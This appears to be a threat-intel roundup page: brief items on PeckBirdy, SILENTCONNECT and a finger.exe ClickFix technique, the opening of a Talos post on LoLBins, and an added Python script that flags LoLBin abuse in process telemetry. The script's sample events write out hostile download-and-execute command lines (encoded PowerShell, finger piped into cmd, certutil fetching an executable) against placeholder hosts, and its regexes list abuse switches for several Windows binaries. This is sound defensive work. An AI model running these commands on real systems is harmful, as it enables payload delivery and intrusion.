China-Aligned Hackers Go Modular with PeckBirdy
China-linked threat groups are using the PeckBirdy framework to abuse built-in system tools and deploy modular backdoors across Asian targets.
Source: Trend Micro
Read more: CyberSecBrief
SILENTCONNECT Uses Fake Invites to Deploy ScreenConnect
The SILENTCONNECT loader uses phishing emails carrying fake invitations and living-off-the-land binaries (LoLBins) to install the ScreenConnect remote-access tool. It evades security controls by fetching C# code from Google Drive and running it in memory through PowerShell, so nothing malicious is written to disk as a conventional executable.
Source: Elastic Security Labs
Read more: CyberSecBrief
'Clickfix Attack' Exploits finger.exe Utility for Stealthy Remote Code Execution (RCE)
CyberDudeBivash News delivers daily cybersecurity threat intel, CVE alerts, malware trends, and crypto security briefings.
A blog from the world class Intelligence Group, Talos, Cisco's Intelligence Group
Attackers' trends tend to come and go. But one popular technique we're seeing at this time is the use of living-off-the-land binaries, or "LoLBins". LoLBins are used by different actors, combined with fileless malware and legitimate cloud services, to improve their chances of staying undetected within an organization, usually during post-exploitation attack phases.

Living-off-the-land tactics mean that attackers use tools that are already installed on the victim's system to carry out their work. This makes it more difficult for defenders to detect attacks and for researchers to identify the actors behind a campaign. In the attacks we're seeing, binaries supplied by the victim's operating system, normally used for legitimate purposes, are being abused by the attackers. Because these binaries are signed, present on every host and run constantly for benign reasons, their mere execution is not an indicator; detection has to rest on how they are invoked, by whom, and what they reach out to.

In this post, we will look at the use of LoLBins through the lens of Cisco's product telemetry. We'll also walk through the most frequently abused Windows system binaries and measure their usage by analyzing data from Cisco AMP for Endpoints. You'll also find an overview of a few recent campaigns we've seen using LoLBins, along with recommendations for how to detect malicious LoLBin activity.
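The items above describe three LoLBin patterns (PowerShell pulling C# from Google Drive and compiling it in memory, finger.exe output piped into a shell, and the general class of system binaries used as downloaders), and the Talos post argues that such binaries are hard to detect because the binary itself is legitimate. The following script is an added example, not code or telemetry from Talos, Elastic, Trend Micro or CyberSecBrief: it runs heuristic rules over constructed process-creation events (Sysmon Event ID 1 style, reduced to parent image, image and command line) and shows why the rules have to key on command-line context and parent process rather than on the image name. The regexes, the rule names and the sample events are this example's own assumptions; it goes beyond the page's three cases by also covering certutil, mshta, regsvr32, rundll32 and bitsadmin, whose abuse switches are well documented.

```python
"""Heuristic triage of LoLBin abuse in process-creation telemetry.

Added example, not code from Talos, Elastic or any item on this page.
The events are constructed (Sysmon Event ID 1 style, reduced to three
fields) and the rules are this example's assumption about how the
techniques described on the page look on a command line, not a vendor
ruleset. Every binary here is legitimate, so the rules key on command
line context and parent process, never on the image name alone.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcessEvent:
    parent: str    # parent image name, e.g. "outlook.exe"
    image: str     # child image name, e.g. "powershell.exe"
    cmdline: str   # full command line as logged


@dataclass(frozen=True)
class Finding:
    index: int     # position of the event in the input list
    rule: str
    severity: str  # "high" or "low"


def _rx(pattern: str) -> re.Pattern:
    return re.compile(pattern, re.IGNORECASE)


# -EncodedCommand and its documented short forms (-e, -ec, -enc).
ENCODED_CMD = _rx(r"(?<!\S)-(e|ec|enc|encodedcommand)(?!\S)")
# A download primitive and an in-memory execute/compile primitive on one
# line: the "C# from a cloud share, run in memory" pattern.
DOWNLOAD = _rx(r"iwr|invoke-webrequest|downloadstring|downloadfile|net\.webclient|https?://")
IN_MEMORY = _rx(r"add-type|iex|invoke-expression|reflection\.assembly|frombase64string")
# finger output piped straight into a shell (ClickFix-style one-liner).
FINGER_PIPE = _rx(r"finger(\.exe)?\s+\S+@\S+.*\|\s*(cmd|powershell)")
FINGER_REMOTE = _rx(r"finger(\.exe)?\s+\S+@\S+")
# Other well-known LoLBin download/execute switches (assumed set).
LOLBIN_SWITCHES = {
    "certutil.exe": _rx(r"-urlcache.*https?://"),
    "mshta.exe": _rx(r"https?://|javascript:|vbscript:"),
    "regsvr32.exe": _rx(r"/i:https?://|scrobj\.dll"),
    "rundll32.exe": _rx(r"javascript:|url\.dll,\s*openurl"),
    "bitsadmin.exe": _rx(r"/transfer.*https?://"),
}
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe", "cmd.exe"}


def evaluate(e: ProcessEvent) -> list[tuple[str, str]]:
    """Return the (rule, severity) pairs that fire for one event."""
    hits: list[tuple[str, str]] = []
    image, parent, cmd = e.image.lower(), e.parent.lower(), e.cmdline
    if image in ("powershell.exe", "pwsh.exe"):
        if ENCODED_CMD.search(cmd):
            hits.append(("powershell encoded command", "high"))
        if DOWNLOAD.search(cmd) and IN_MEMORY.search(cmd):
            hits.append(("powershell download and in-memory execute", "high"))
    if image == "cmd.exe" and FINGER_PIPE.search(cmd):
        hits.append(("finger output piped into shell", "high"))
    if image == "finger.exe" and FINGER_REMOTE.search(cmd):
        hits.append(("finger.exe contacting remote host", "low"))
    switches = LOLBIN_SWITCHES.get(image)
    if switches and switches.search(cmd):
        hits.append((f"{image} download/execute switch", "high"))
    if parent in OFFICE_PARENTS and image in SCRIPT_HOSTS:
        hits.append(("office app spawned script host", "low"))
    return hits


def triage(events: list[ProcessEvent]) -> list[Finding]:
    """Run every rule over every event and collect the findings."""
    return [Finding(i, rule, sev)
            for i, e in enumerate(events)
            for rule, sev in evaluate(e)]


# Constructed sample telemetry: documentation-range IPs, a placeholder
# Drive file id and a base64 blob that is not a real payload.
SAMPLE_EVENTS = [
    ProcessEvent("outlook.exe", "powershell.exe",
                 "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"),
    ProcessEvent("cmd.exe", "powershell.exe",
                 'powershell -c "Add-Type -TypeDefinition (iwr https://drive.google.com/uc?id=FILEID).Content"'),
    ProcessEvent("explorer.exe", "cmd.exe", 'cmd /c "finger admin@203.0.113.10 | cmd"'),
    ProcessEvent("cmd.exe", "finger.exe", "finger admin@203.0.113.10"),
    ProcessEvent("cmd.exe", "certutil.exe",
                 "certutil -urlcache -split -f http://198.51.100.7/a.txt C:\\Users\\Public\\a.exe"),
    # Benign: the same binaries in ordinary context. None of these fire.
    ProcessEvent("explorer.exe", "powershell.exe", "powershell.exe -File C:\\scripts\\inventory.ps1"),
    ProcessEvent("cmd.exe", "certutil.exe", "certutil -verify C:\\certs\\server.cer"),
    ProcessEvent("svchost.exe", "regsvr32.exe", "regsvr32 /s C:\\Windows\\System32\\msxml3.dll"),
]


if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        e = SAMPLE_EVENTS[f.index]
        print(f"[{f.severity}] {f.rule}: {e.parent} -> {e.image} :: {e.cmdline}")
```

The three benign events at the end are the point of the exercise: powershell.exe, certutil.exe and regsvr32.exe appear in both halves of the list and only the invocation context separates them. In production the low-severity rules (Office spawning a script host, finger reaching a remote host) are hunting leads to correlate with network telemetry rather than alerts on their own, and the regexes above will need tuning against each environment's baseline before they are worth paging anyone for.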